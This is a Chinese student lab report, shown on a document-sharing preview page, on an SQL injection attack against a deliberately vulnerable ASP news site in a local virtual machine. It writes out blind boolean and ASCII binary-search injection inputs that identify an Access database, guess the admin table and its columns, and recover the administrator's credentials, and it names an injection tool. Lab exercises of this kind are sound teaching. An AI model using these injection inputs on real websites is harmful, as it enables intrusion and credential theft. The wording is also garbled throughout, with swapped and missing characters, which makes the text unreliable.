sql注入攻击实验报告.docx

  1. 1、本文档共14页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
实验报告 (实验名称:SQL注入攻击) 一、实验目的 经过SQL注入攻击,掌握网站的工作体制,认识到SQL注入攻击的防范举措,加强对Web攻击的防范。 二、实验环境 描绘实验展开所鉴于的网络环境,给出网络拓扑、IP地点、web服务器、客户机等信息。 宿主机(客户机):操作系统为Windows10,IP为,在主机上安装虚构化软件VmwarePlayer,在此基础上创立虚构机并安装操作系统,进行网络配置,采用环回适配器,桥接模式,实现宿主机与虚构机之间的网络通信, 虚构机(Web服务器):操作系统为WindowsXP,IP为, 本实验利用windows的iis服务搭建了一个有SQL注入破绽的网站“ASP新 闻发布系统”,以该网站为目标,对其实施SQL注入攻击。 本实验所需工具如下: IIS是InternetInformationServer的缩写,是微软提供的Internet服务 器软件,包括Web、FTP、Mail等服务器,也是当前常用的服务器软件。版本不限。“啊D”注入工具:对“MSSQL显错模式”、“MSSQL不显错模式”、 “Access”等数据库都有很好的注入检测能力,内集“跨库查问”、“注入点扫描”、“管理入口检测”、“目录查察”等等于一身的注入工具包。 “ASP新闻发布系统”Ok3w源码。 三、实验内容 (一)配置实验环境, 首先选择网络适配器,安装环回适配器,在主机上安装VmwarePlayer,成功启动虚构机。接着配置宿主机和虚构机的IP,如图 要注意的是,配置主机上的IP时,应当选择VMnet8,并且注意勾取Bridge 1 然后,考证宿主机和虚构机是否联通,结果显示连结成功。 最后在虚构机上安装IIS程序,翻开浏览器,输入地点“”,检查网站搭建情况。 2 成功! (二)寻找注入点 在宿主机上,翻开网页id=95,能够正常翻开页面。 进行注入测试,键入id=95and1=1,返回页面不变。 3 键入id=95and1=2,返回页面犯错。 因此,可确定该网站存在注入点。 (三)判断数据库种类 用系统表的方法进行判断,分别键入 id=95and(selectcount(*)fromsysobjects)>0 id=95and(selectcount(*)frommsysobjects)>0 4 两者返回均犯错,可知是access数据库。 5 (四)猜测表名 一般网站后台的管理员都默认在表admin中,我们先试试看,键入: id=95and(selectcount(*)fromadmin)<>0 返回页面正常,可知该网站后台数据库中存在着表名为admin的表。 (五)猜测字段名不同企业网站有不同的字段名,但一般都有三个字段,分别记 录ID号、用户名和密码,常用的字段名为:id,username,password。 分别键入id=95and(selectcount(id)fromadmin)<>0id=95and(selectcount(username)fromadmin)<>0id=95and(selectcount(password)fromadmin)<>0 三者返回均正常。可知,表admin中存在的三个字段:id,username,password。 注:“username”的截图破坏,可是返回正常,望教员通融。 (六)猜测管理员用户名和密码 1.确定表admin中有几条记录,键入id=95and(selectcount(*)fromadmin)=1返回页面正常。 6 可知,表admin只有一条。 2.猜用名度,入id=95and(selectlen(username)fromadmin)=1返 回出,入id=95and(selectlen(username)fromadmin)=2返回出, 3/4/5?, 7 直到返回页面正确。测试到5的时候,返回正常。可知,用户名长度为5。 猜测用户名内容,采用ASCII码剖析法先猜测第1位,用二分法,键入id=95 and(selectcount(*)fromadminwhere(asc(mid(username,1,1)))between30and125)<>0返回正确,进一步缩小范围between70and100,between85and100, between90and100,=97。 可知第一个字符为a。 依此类推,猜测之后的每一位字符, 8 最后获得用户名为admin。 4.猜测密码,同理:id=95and(selectlen(password)fromadmin)=6 所以密码为6位。 9 10 最终获得密码为6位:123456。 (七)寻找到后台管理窗口翻开“啊D”软件,点击进入“管理入口检测”选项,点击“检测管理入口”,进行检测, 11 如图:翻开检测

文档评论(0)

132****0439 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档